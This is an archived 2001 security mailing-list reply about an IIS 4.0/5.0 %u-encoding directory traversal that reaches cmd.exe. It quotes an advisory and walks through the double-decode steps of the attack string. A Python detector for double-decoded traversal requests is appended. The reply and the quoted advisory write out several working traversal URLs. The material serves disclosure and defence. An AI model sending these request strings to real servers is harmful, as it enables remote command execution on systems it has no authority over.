Re: New vulnerability in IIS4.0/5.0

From: Dave Ahmad (da@securityfocus.com)
Date: 09/19/01


Date: Wed, 19 Sep 2001 13:50:02 -0600 (MDT)
From: Dave Ahmad <da@securityfocus.com>
To: ALife // BERG <buginfo@inbox.ru>
Subject: Re: New vulnerability in IIS4.0/5.0
Message-ID: <Pine.GSO.4.30.0109191127570.19628-100000@mail>


This seems to just be another way to exploit the double decode
vulnerability (Bugtraq ID 2708). There is a possibility that it may be a
new issue due to the use of the '%u' method of encoding. It does not look
that way to us.

On our test machines (and at eEye), systems do not seem to be vulnerable
after applying the MS01-026 hotfix (or the MS01-044 patch).

Ryan Permeh of eEye Digital Security provided a breakdown of an encoded
attack string:

The attack string used successfully against an IIS server (Win2K, SP2):

http://localhost/scripts/..%u0025u005c..%u0025u005cwinnt/system32/cmd.exe?/c+dir+c:\

First decode sequence (it replaces %u0025 with %):
http://localhost/scripts/..%u005c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\

Second decode sequence (it replaces %u005c with /):
http://localhost/scripts/../../winnt/system32/cmd.exe?/c+dir+c:\

The double decode vulnerability is fixed in MS01-026. I believe the fix
is included in the cumulative patch released with MS01-044.

It doesn't look like a new vulnerability, but we are awaiting confirmation
from Microsoft.

Has anyone managed to exploit a patched system?

Thanks Ryan & eEye.

Regards,

Dave Ahmad
Security Focus
www.securityfocus.com

On Wed, 19 Sep 2001, ALife // BERG wrote:

> -----[ Bright Eyes Research Group | Advisory # be00001e ]-----------------
>
> Remote users can execute any command on several
> IIS 4.0 and 5.0 systems by using UTF codes
>
> -------------------------------------[ security.instock.ru ]--------------
>
> Topic: Remote users can execute any command on several
> IIS 4.0 and 5.0 systems by using UTF codes
>
> Announced: 2001-09-19
> Credits: ALife <buginfo@inbox.ru>
> Affects: Microsoft IIS 4.0/5.0
>
> --------------------------------------------------------------------------
>
> ---[ Description
>
> For example, the target has a virtual executable directory (e.g.
> "scripts") that is located on the same drive as the Windows system.
> Submit a request like this:
>
> http://target/scripts/..%u005c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
>
> The directory listing of C:\ will be revealed.
>
> Of course, the same effect can be achieved by this kind of processing
> of '/' and '.'. For example: "..%u002f", ".%u002e/", "..%u00255c",
> "..%u0025%u005c" ...
>
> Note: the attacker can only run commands with the privileges of the
> IUSR_machinename account.
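
As an added, defender-side illustration (not code from this thread, eEye or Microsoft): a small Python check that replays the two decode passes Ryan walks through above over a request path and flags requests that only become a traversal after the second pass, which is exactly the class a filter that decodes once will miss. It generalises slightly by running any number of passes up to a fixed point; the %u handling and the backslash-as-separator normalisation are assumptions modelled on the behaviour described in the thread.

```python
import re

# One decode pass: %uXXXX (Microsoft-style) and %XX escapes -> characters.
_ESC = re.compile(r'%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})')


def decode_once(s: str) -> str:
    """Apply a single pass of %uXXXX / %XX decoding."""
    return _ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def decode_passes(path: str, passes: int = 2) -> list:
    """Return the path after each pass; index 0 is the raw input.
    Stops early once a pass changes nothing (fixed point)."""
    stages = [path]
    for _ in range(passes):
        nxt = decode_once(stages[-1])
        stages.append(nxt)
        if nxt == stages[-2]:
            break
    return stages


def escapes_root(path: str) -> bool:
    """True if the path climbs above its root once '\\' is treated as '/'
    (the separator handling the second decode in the thread relies on)."""
    depth = 0
    for seg in path.replace('\\', '/').split('/'):
        if seg == '..':
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ('', '.'):
            depth += 1
    return False


def inspect_request(url_path: str, passes: int = 2) -> dict:
    """Classify a request path (query string ignored) by when it turns
    into a traversal: after one decode, or only after a second one."""
    stages = decode_passes(url_path.split('?', 1)[0], passes)
    single = escapes_root(stages[1] if len(stages) > 1 else stages[0])
    final = escapes_root(stages[-1])
    return {
        "stages": stages,
        "traversal_after_single_decode": single,
        "traversal_after_double_decode": final,
        "double_decode_only": final and not single,  # what a one-pass filter misses
    }
```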
